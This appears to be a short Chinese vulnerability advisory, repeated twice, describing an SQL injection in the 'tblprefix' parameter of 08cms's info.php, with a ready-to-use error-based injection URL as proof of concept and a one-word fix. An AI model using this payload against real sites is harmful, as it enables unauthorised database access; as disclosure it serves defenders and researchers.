VULHUB ™

###0x01影响范围 08cms广泛应用于汽车、房产系统。厂商： ``` http://www.08cms.com/ 08cms ``` 谷歌关键字用户量很大：  ###0x02漏洞描述 08cms在文件info.php处对参数tblprefix过滤不严格，导致出现SQL注入漏洞。远程攻击者可以构造SQL语句，执行恶意操作。 ###0x03漏洞详情 SQL注入点： ``` /info.php?fid=1&tblprefix=cms_msession tblprefix存在注入 ```  ###0x04漏洞证明 可以构造如下poc进行利用： ``` http://***.com/info.php?fid=1&tblprefix=cms_msession where (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- - ```  ###0x05修复方案 过滤。

###0x01影响范围 08cms广泛应用于汽车、房产系统。厂商： ``` http://www.08cms.com/ 08cms ``` 谷歌关键字用户量很大：  ###0x02漏洞描述 08cms在文件info.php处对参数tblprefix过滤不严格，导致出现SQL注入漏洞。远程攻击者可以构造SQL语句，执行恶意操作。 ###0x03漏洞详情 SQL注入点： ``` /info.php?fid=1&tblprefix=cms_msession tblprefix存在注入 ```  ###0x04漏洞证明 可以构造如下poc进行利用： ``` http://***.com/info.php?fid=1&tblprefix=cms_msession where (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(md5(1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- - ```  ###0x05修复方案 过滤。